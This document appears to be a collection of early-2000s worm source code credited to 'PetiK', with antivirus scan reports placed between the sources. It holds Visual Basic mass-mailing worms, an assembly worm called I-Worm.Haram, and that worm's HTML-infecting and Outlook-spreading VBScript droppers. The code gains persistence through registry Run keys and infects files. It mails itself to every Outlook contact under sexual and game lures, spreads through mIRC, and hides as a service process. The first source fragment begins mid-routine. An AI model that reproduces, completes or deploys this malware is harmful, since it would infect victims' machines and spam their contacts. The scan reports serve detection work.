    Set map = out.GetNameSpace("MAPI")
    If out = "Outlook" Then
        map.Logon "profile", "password"
        For y = 1 To map.AddressLists.Count
            Set z = map.AddressLists(y)
            x = 1
            Set mel = out.CreateItem(0)
            For oo = 1 To z.AddressEntries.Count
                e = z.AddressEntries(x)
                ml.Recipients.Add e
                x = x + 1
                If x < 250 Then oo = z.AddressEntries.Count
            Next oo
            mel.Subject = "New Visual Tool for U"
            mel.Body = "Look at this new tool by clicking on attached file."
            mel.Attachments.Add orig, 1, 1, "visual_tool.exe"
            mel.Send
            e = ""
        Next y
        map.Logoff
    End If
    If Day(Now) = 19 Then about.Visible = True
End Sub

Sub inf(folder)
    Set fso = CreateObject("Scripting.FilesystemObject")
    Set ws = CreateObject("WScript.Shell")
    orig = App.Path & "\" & App.EXEName & ".exe"
    Set dire = fso.GetFolder(folder)
    Set fc = dire.Files
    For Each f1 In fc
        ext = fso.GetExtensionName(f1.Path)
        ext = LCase(ext)
        oext = LCase(f1.Name)
        If (ext <> "vbs") Then
            If (Right(oext, 8) <> "old_.exe") Then
                'MsgBox oext, vbInformation, Right(oext, 8)
                FileCopy orig, f1.Path & "old_.exe"
            End If
        End If
    Next
End Sub

Scan report for Visual.exe, received on 05.16.2009 19:47:59 (CET). The per-engine rows did not survive extraction; the columns are reproduced in their original order, and the results cannot be mapped back to individual engines.

Engines (40): a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Engine versions: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16

Results (detection names): Backdoor.Win32.VB!IK Win32/Petvb.worm.9216 Worm/Petik.K Worm/Win32.Win32 W32/Malware!c440 Win32:Petik-C I-Worm/Petik Win32.Petik.K@mm I-Worm.Petik Worm.VB-874 Worm.Win32.Petik.VisTol WIN.WORM.Virus Win32.PetTick.dr Win32/Petticky.A W32/Malware!c440 Email-Worm.Win32.Petik W32/Petik.U@mm Win32.Petik.K@mm Backdoor.Win32.VB Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.dr W32/PetTick.dr Worm.Petik.K Worm:Win32/Petick@mm Win32/Petik.VisTol W32/Petik.AQ Worm/W32.Petik.9216 W32/Petik.R.worm I-Worm.Petvtl.A Medium Risk Malware Trojan.Petik.a W32/Petik-U Email-Worm.Win32.Petik W32.Pet_Ticky.gen WORM_PETIK.A Email-Worm.Win32.Petik I-Worm.Win32.PetLil.A I-Worm.Petvtl.A

Additional information
File size: 9216 bytes
MD5: b2ff3ada6672ac9266a6fac5842ae706
SHA1: 93d70d8a36a4139f494fe82fb8d418104a72a899
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

' Name     : W32.HLLW.Lili
' Author   : PetiK
' Language : Visual Basic
' Date     : 31/05/2002
'
Attribute VB_Name = "Module1"
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _
    (ByVal lpszSection As String, ByVal lpszKey As String, _
     ByVal lpszString As String, ByVal lpszFile As String)

Sub Main()
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set ws = CreateObject("WScript.Shell")
    Call CopyWorm
    Call inf(App.Path)
    Call inf(ws.SpecialFolders("MyDocuments"))
    Call inf(fso.GetSpecialFolder(0))
    Call inf(fso.GetSpecialFolder(1))
    Call inf(fso.GetSpecialFolder(2))
    If Day(Now) = 1 Or Day(Now) = 15 Or Day(Now) = 31 Then
        xxxpic.Show 1
    Else
        MsgBox "Sorry, no XXX pic today. Wait And See.", vbExclamation, "XXX Pic"
    End If
End Sub

Sub CopyWorm()
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set ws = CreateObject("WScript.Shell")
    orig = App.Path
    If Right(orig, 1) <> "\" Then orig = orig & "\"
    orig = orig & App.EXEName & ".exe"
    copywrm = fso.GetSpecialFolder(0)
    If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\"
    For I = 1 To 8
        Randomize (Timer)
        ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
    Next I
    copywrm = copywrm & ncopy & ".exe"
    FileCopy orig, copywrm
    ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm
    ' schedule deletion of the original at next boot through WININIT.INI
    Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI")
    FileCopy orig, "C:\XXXPic.exe"
    Set out = CreateObject("Outlook.Application")
    Set map = out.GetNameSpace("MAPI")
    If out = "Outlook" Then
        map.Logon "profile", "password"
        For y = 1 To map.AddressLists.Count
            Set z = map.AddressLists(y)
            x = 1
            Set mel = out.CreateItem(0)
            For oo = 1 To z.AddressEntries.Count
                e = z.AddressEntries(x)
                ml.Recipients.Add e
                x = x + 1
                If x < 250 Then oo = z.AddressEntries.Count
            Next oo
            mel.Subject = "XXX Picture..."
            mel.Body = "A pretty girl waits for you. Click on attached file..."
            mel.Attachments.Add "C:\XXXPic.exe"
            mel.Send
            e = ""
        Next y
        map.Logoff
    End If
End Sub

' Companion infection: for each data file, drop a same-named .exe and register it under Run
Sub inf(dir)
    On Error Resume Next
    orig = ""
    orig = App.Path
    If Right(orig, 1) <> "\" Then orig = orig & "\"
    orig = orig & App.EXEName & ".exe"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set ws = CreateObject("WScript.Shell")
    Set pwoj = fso.GetFolder(dir)
    Set fc = pwoj.Files
    For Each f1 In fc
        ext = LCase(fso.GetExtensionName(f1.Path))
        If (ext = "vbs") Or (ext = "htm") Or (ext = "doc") Or (ext = "xls") Or (ext = "bmp") _
            Or (ext = "gif") Or (ext = "jpg") Or (ext = "pdf") Or (ext = "js") Then
            cpy = ""
            cpy = Left(f1.Path, Len(f1.Path) - 4)
            FileCopy orig, cpy & ".exe"
            reg = fso.GetBaseName(f1.Path)
            ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & reg, cpy & ".exe"
        End If
    Next
End Sub

Scan report for Liliworm.exe, received on 05.16.2009 17:43:19 (CET). The per-engine rows did not survive extraction; the columns are reproduced in their original order, and the results cannot be mapped back to individual engines.

Engines (40): a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Engine versions: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16

Results (detection names): Email-Worm.Win32.Lorm!IK Win32/PetLil.worm.37376 VBS/Gorum.XPic.2 Worm/Win32.Win32 W32/Petik.A@mm Win32:PetLil I-Worm/Lorm Win32.Petlil.B@mm I-Worm.Lorm Worm.Win32.Lorm.A Win32.HLLM.Generic.58 Win32.Lorm Win32/Petlil.A W32/Petik.A@mm Email-Worm.Win32.Lorm W32/Petik.A@mm Win32.Petlil.B@mm Email-Worm.Win32.Lorm Email-Worm.Win32.Lorm Email-Worm.Win32.Lorm W32/PetLil@MM W32/PetLil@MM Script.Gorum.XPic.2 Worm:Win32/PetLil@mm Win32/Lorm.A Pet_Tick.37376.A Worm/W32.Lorm.37376 W32/Petlil.A I-Worm.Petlil.A Medium Risk Malware Worm.Liliworm W32/Petlil-A W32.Pet_Ticky.B@mm W32.Pet_Ticky.B@mm W32/Lorm WORM_PETLIL.A Email-Worm.Win32.Lorm I-Worm.Win32.PetLil.B I-Worm.Petlil.A

Additional information
File size: 37376 bytes
MD5: fce1de67fd47f4b6b67ab7eba0bf4246
SHA1: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment *
  Name     : I-Worm.Haram
  Author   : PetiK
  Language : win32asm
  Date     : May 13th 2002 - June 1st 2002
  Size     : 5192 bytes (compressed with Petite Tool)
  Comments :
   - Copies itself to %sysdir%\FunnyGame.exe
   - Searches all .doc files in the "Personal" folder and creates a new virus HTML file next to each one:
       example : document.doc -> document.htm
       1) document.doc : the good DOC file
       2) document.htm : the HTM virus (1571 bytes)
   - Takes the name of every active process and appends .htm:
       example : process.exe -> process.exe.htm
       3) process.exe     : real name of the active process
       4) process.exe.htm : the HTM virus (in the "C:\backup" folder for Win ME/2k/XP)
   - Creates a random-named file in the StartUp folder to spread with Outlook
   - On the 10th, payload : opens and closes the CD door and displays a message box in a loop
*

.586p
.model flat
.code
JUMPS
include win32api.inc

LF      equ 10
CR      equ 13
CRLF    equ <13,10>

; push the address of an inline zero-terminated string
@pushsz macro msg2psh, empty
  local next_instr
  ifnb <empty>
    %out too much arguments in macro '@pushsz'
    .err
  endif
  call next_instr
  db msg2psh,0
next_instr:
endm

; advance esi past the zero terminator of the current string
@endsz macro
  local nxtchr
nxtchr:
  lodsb
  test al,al
  jnz nxtchr
endm

api macro a
  extrn a:proc
  call a
endm

WIN32_FIND_DATA struct
  dwFileAttributes   dd 0
  ftCreationTime     dd ?,?
  ftLastAccessTime   dd ?,?
  ftLastWriteTime    dd ?,?
  nFileSizeHigh      dd 0
  nFileSizeLow       dd 0
  dwReserved0        dd 0,0
  cFileName          db 260 dup(0)
  cAlternateFileName db 14 dup(0)
                     db 2 dup (0)
WIN32_FIND_DATA ends

PROCESSENTRY32 STRUCT
  dwSize              DWORD ?
  cntUsage            DWORD ?
  th32ProcessID       DWORD ?
  th32DefaultHeapID   DWORD ?
  th32ModuleID        DWORD ?
  cntThreads          DWORD ?
  th32ParentProcessID DWORD ?
  pcPriClassBase      DWORD ?
  dwFlags             DWORD ?
  szExeFile           db 260 dup(?)
PROCESSENTRY32 ENDS

start:
  pushad
  @SEH_SetupFrame <jmp end_worm>

hide_the_worm:
  call hide_worm

get_name:
  push 50
  mov esi,offset orgwrm
  push esi
  push 0
  api GetModuleFileNameA

get_copy_name:                          ; cpywrm = %sysdir%\FunnyGame.exe
  mov edi,offset cpywrm
  push edi
  push 50
  push edi
  api GetSystemDirectoryA
  add edi,eax
  mov eax,'nuF\'
  stosd
  mov eax,'aGyn'
  stosd
  mov eax,'e.em'
  stosd
  mov eax,'ex'
  stosd
  pop edi

copy_worm:
  push 1
  push edi
  push esi
  api CopyFileA
  test eax,eax
  je ok_copy
  push 50                               ; HKLM\...\Run\Haram = copy path
  push edi
  push 1
  @pushsz "Haram"
  @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
  push 80000002h
  api SHSetValueA
  push 50
  push offset msgwrm
  push esi
  api GetFileTitleA
  push 10h                              ; decoy error box on first run
  push offset msgwrm
  @pushsz "ERROR : this file is not a valid Win32 file."
  push 0
  api MessageBoxA

ok_copy:
  call inf_doc_personal

get_startup_path:                       ; CSIDL_STARTUP
  push 0
  push 7
  push offset startup
  push 0
  api SHGetSpecialFolderPathA
  push offset startup
  api SetCurrentDirectoryA
  call cr_vbsname
  mov edi,offset vbsname
  push 0
  push 1
  push 2
  push 0
  push 1
  push 40000000h
  push edi
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
  push e_vbs - s_vbs
  push offset s_vbs
  push ebp
  api WriteFile
  push ebp
  api CloseHandle

payload:                                ; wDay == 10
  mov eax,offset sysTime
  push eax
  api GetSystemTime
  lea eax,sysTime
  cmp word ptr [eax+6],10
  jne end_payload
  xor eax,eax
  push eax
  push eax
  push eax
  @pushsz "set CDAudio door open"
  api mciSendStringA
  push 500
  api Sleep
  xor eax,eax
  push eax
  push eax
  push eax
  @pushsz "set CDAudio door closed"
  api mciSendStringA
  push 40h
  @pushsz "I-Worm.Haram"
  @pushsz "Coded by PetiK - ©2002 - France"
  push 0
  api MessageBoxA
  api GetTickCount
  push 10000
  pop ecx
  xor edx,edx
  div ecx
  inc edx
  mov ecx,edx
  push ecx
  api Sleep
  jmp payload

end_payload:
  call inf_process

end_worm:
  @SEH_RemoveFrame
  popad
  push 0
  api ExitProcess

; Registered as Service Process
hide_worm Proc
  pushad
  @pushsz "KERNEL32.DLL"
  api GetModuleHandleA
  xchg eax,ecx
  jecxz end_hide_worm
  @pushsz "RegisterServiceProcess"
  push ecx
  api GetProcAddress
  xchg eax,ecx
  jecxz end_hide_worm
  push 1
  push 0
  call ecx
end_hide_worm:
  popad
  ret
hide_worm EndP

; spread with mIRC. Thanx to Microsoft.
Spread_Mirc Proc
  push offset cpywrm
  push offset mirc_exe
  api lstrcpy
  call @mirc
  db "C:\mirc\script.ini",0
  db "C:\mirc32\script.ini",0
  db "C:\progra~1\mirc\script.ini",0
  db "C:\progra~1\mirc32\script.ini",0
@mirc:
  pop esi
  push 4
  pop ecx
mirc_loop:
  push ecx
  push 0
  push 80h
  push 2
  push 0
  push 1
  push 40000000h
  push esi
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
@tmp_mirc:
  push e_mirc - s_mirc
  push offset s_mirc
  push ebp
  api WriteFile
  push ebp
  api CloseHandle
  @endsz
  pop ecx
  loop mirc_loop
end_spread_mirc:
  ret
Spread_Mirc EndP

inf_doc_personal Proc
  pushad
get_personal_folder:                    ; CSIDL_PERSONAL
  push 0
  push 5
  push offset personal
  push 0
  api SHGetSpecialFolderPathA
  push offset personal
  api SetCurrentDirectoryA
fff_doc:
  push offset ffile
  @pushsz "*.doc"
  api FindFirstFileA
  inc eax
  je end_f_doc
  dec eax
  mov [hfind],eax
cr_file:                                ; document.doc -> document.htm
  push offset ffile.cFileName
  push offset new_file
  api lstrcpy
  mov esi,offset new_file
  push esi
  api lstrlen
  add esi,eax
  sub esi,4
  mov [esi],"mth."
  lodsd
  push 0
  push 1
  push 2
  push 0
  push 1
  push 40000000h
  push offset new_file
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
  push e_htm - s_htm
  push offset s_htm
  push ebp
  api WriteFile
  push ebp
  api CloseHandle
; to become \SYSTEM\Wsock32
fnf_doc:
  push offset ffile
  push [hfind]
  api FindNextFileA
  test eax,eax
  jne cr_file
  push [hfind]
  api FindClose
end_f_doc:
  popad
  ret
inf_doc_personal EndP

inf_process Proc
  popad
create_folder:
  push 0
  @pushsz "C:\backup"
  api CreateDirectoryA
  @pushsz "C:\backup"
  api SetCurrentDirectoryA
enum_process:                           ; TH32CS_SNAPPROCESS
  push 0
  push 2
  api CreateToolhelp32Snapshot
  mov lSnapshot,eax
  inc eax
  je end_inf_process
  lea eax,uProcess
  mov [eax.dwSize], SIZE PROCESSENTRY32
  lea eax,uProcess
  push eax
  push lSnapshot
  api Process32First
check_process:
  test eax,eax
  jz end_process
  push ecx
  mov eax,ProcessID
  push offset uProcess
  cmp eax,[uProcess.th32ProcessID]
  je NextProcess
  lea ebx,[uProcess.szExeFile]          ; process.exe -> process.exe.htm
  push ebx
  push offset new_name
  api lstrcpy
  mov edi,offset new_name
  push edi
  api lstrlen
  add edi,eax
  mov eax,"mth."
  stosd
  xor eax,eax
  stosd
  push offset new_name
  @pushsz "System.htm"
  api lstrcmp
  test eax,eax
  jz NextProcess
  push 0
  push 1
  push 2
  push 0
  push 1
  push 40000000h
  push offset new_name
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
  push e_htm - s_htm
  push offset s_htm
  push ebp
  api WriteFile
  push ebp
  api CloseHandle
NextProcess:
  push offset uProcess
  push lSnapshot
  api Process32Next
  jmp check_process
end_process:
  push lSnapshot
  api CloseHandle
end_inf_process:
  pushad
  ret
inf_process EndP

; build a 10-digit random name ending in .vbs from GetTickCount
cr_vbsname Proc
  mov edi,offset vbsname
; api GetTickCount
  push 10
  pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
  push ecx
  api GetTickCount
  push '9'-'0'
  pop ecx
  xor edx,edx
  div ecx
  xchg eax,edx
  add al,'0'
  stosb
  api GetTickCount
  push 100
  pop ecx
  xor edx,edx
  div ecx
  push edx
  api Sleep
  pop ecx
  loop name_g
  mov eax,"sbv."
  stosd
  ret
cr_vbsname EndP

.data
ffile       WIN32_FIND_DATA <?>
sysTime     db 16 dup(0)
uProcess    PROCESSENTRY32 <?>
ProcessID   dd ?
lSnapshot   dd ?
new_name    db 100 dup (?)
orgwrm      db 50 dup (0)
cpywrm      db 50 dup (0)
msgwrm      db 50 dup (0)
startup     db 70 dup (0)
personal    db 70 dup (0)
new_file    db 90 dup (0)
vbsname     db 20 dup (0)
byte_write  dd ?
hfind       dd ?

s_mirc:
  db "[script]",CRLF
  db ";Don't edit this file.",CRLF,CRLF
  db "n0=on 1:JOIN:{",CRLF
  db "n1= /if ( $nick == $me ) { halt }",CRLF
  db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
  db CRLF,"n3=}",0
e_mirc:

s_htm:
  db '<haram>',CRLF
  db '<html><head><title>Windows Media Player</title></head><body>',CRLF
  db '<script language=VBScript>',CRLF
  db 'On Error Resume Next',CRLF
  db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
  db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
  db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
  db 'If err.number=429 Then',CRLF
  db 'kupfkvqg.Run javascript:location.reload()',CRLF
  db 'Else',CRLF,CRLF
  db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
  db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
  db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
  db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
  db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
  db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
  db 'End If',CRLF,CRLF
  db 'Function glvqglvb(dir)',CRLF
  db 'If upfkupfk.FolderExists(dir) Then',CRLF
  db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
  db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
  db ' For each lvqgvqgl in bbblvqgl',CRLF
  db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
  db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
  db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
  db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
  db ' rhmwrrhm.Close()',CRLF
  db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
  db ' htmorg=rhmwrrhm.ReadAll()',CRLF
  db ' rhmwrrhm.Close()',CRLF
  db ' Set mwrrhmwr=document.body.createTextRange',CRLF
  db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
  db ' rhmwrrhm.WriteLine "<haram>"',CRLF
  db ' rhmwrrhm.Write(htmorg)',CRLF
  db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
  db ' rhmwrrhm.Close()',CRLF
  db ' Else',CRLF
  db ' rhmwrrhm.Close()',CRLF
  db ' End If',CRLF
  db ' End If',CRLF
  db ' Next',CRLF
  db 'End If',CRLF
  db 'End Function',CRLF
  db '</script></body></html>',0
e_htm:

s_vbs:
  db 'On Error Resume Next',CRLF
  db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
  db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
  db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
  db 'copyname = sys&"\FunnyGame.exe"',CRLF
  db 'Set htgx = CreateObject("Outlook.Application")',CRLF
  db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
  db 'For each c In ofcc.AddressLists',CRLF
  db 'If c.AddressEntries.Count <> 0 Then',CRLF
  db 'For d = 1 To c.AddressEntries.Count',CRLF
  db 'Set etldb = htgx.CreateItem(0)',CRLF
  db 'etldb.To = c.AddressEntries(d).Address',CRLF
  db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
  db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
  db 'etldb.Attachments.Add(copyname)',CRLF
  db 'etldb.DeleteAfterSubmit = True',CRLF
  db 'If etldb.To <> "" Then',CRLF
  db 'etldb.Send',CRLF
  db 'End If',CRLF
  db 'Next',CRLF
  db 'End If',CRLF
  db 'Next',0
e_vbs:
ends
end start

HARAM.HTM

<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
On Error Resume Next
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else

glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If

Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
 Set bbbbbbbb=upfkupfk.GetFolder(dir)
 Set bbblvqgl=bbbbbbbb.Files
 For each lvqgvqgl in bbblvqgl
 lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
 If lvqglvqr="htm" or lvqglvqr="html" Then
 Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
 if rhmwrrhm.ReadLine <> "<haram>" Then
 rhmwrrhm.Close()
 Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
 htmorg=rhmwrrhm.ReadAll()
 rhmwrrhm.Close()
 Set mwrrhmwr=document.body.createTextRange
 Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
 rhmwrrhm.WriteLine "<haram>"
 rhmwrrhm.Write(htmorg)
 rhmwrrhm.WriteLine mwrrhmwr.htmltext
 rhmwrrhm.Close()
 Else
 rhmwrrhm.Close()
 End If
 End If
 Next
End If
End Function
</script></body></html>

HARAM.VBS

On Error Resume Next
Set terqne = CreateObject("Scripting.FileSystemObject")
Set qumhzh = CreateObject("WScript.Shell")
Set sys = terqne.GetSpecialFolder(1)
copyname = sys&"\FunnyGame.exe"
Set htgx = CreateObject("Outlook.Application")
Set ofcc = htgx.GetNameSpace("MAPI")
For each c In ofcc.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set etldb = htgx.CreateItem(0)
etldb.To = c.AddressEntries(d).Address
etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name
etldb.Body = "Play at this funny game. It's very cool !"
etldb.Attachments.Add(copyname)
etldb.DeleteAfterSubmit = True
If etldb.To <> "" Then
etldb.Send
End If
Next
End If
Next

File Haram.exe received on 05.16.2009 11:58:29 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.15
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.15
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.15
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.15
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.735  2009.05.14
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.16
PCTools  4.4.2.0  2009.05.15
Prevx  3.0  2009.05.16
Rising  21.29.52.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15
VirusBuster  4.6.5.0  2009.05.15

Result: VBS.Lee.Based!IK | Win32/PetTick.worm.5192 | TR/Navigator.VBS | Worm/Win32.Win32 | W32/Malware!f42c | Win32:Trojan-gen {Other} | I-Worm/Petik | Generic.Malware.SIMbg.1C80A513 | I-Worm.Petik | Worm.Funnygame | Worm.Win32.Petik.Haram | Win32.Petik.7680 | Suspicious File | VBS/Rophage.B | W32/Malware!f42c | Email-Worm.Win32.Petik | W32/Petik!worm | Generic.Malware.SIMbg.1C80A513 | VBS.Lee.Based | Email-Worm.Win32.Petik | Email-Worm.Win32.Petik | W32/PetTick@MM | Artemis!722436AE8486 | Trojan.Navigator.VBS | Worm:Win32/PetTick.H@mm | Win32/Petik.Haram | W32/Petik.AD | W32/Petik.W.worm | I-Worm.Pethar.A | Worm.Mail.Win32.Petik | W32/Petik-Y | Email-Worm.Win32.Petik | W95.Pet_Tick.gen | Email-Worm.Win32.Petik | I-Worm.Win32.Petik.5192 | I-Worm.Pethar.A

Additional information
File size: 5192 bytes
MD5...: 722436ae848608575bdf5d7036f3d1a9
SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6
PEiD..: PEtite v2.2

File Haram.htm received on 05.16.2009 11:58:32 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.15
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.15
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.15
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.15
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.735  2009.05.14
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.16
PCTools  4.4.2.0  2009.05.15
Prevx  3.0  2009.05.16
Rising  21.29.52.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
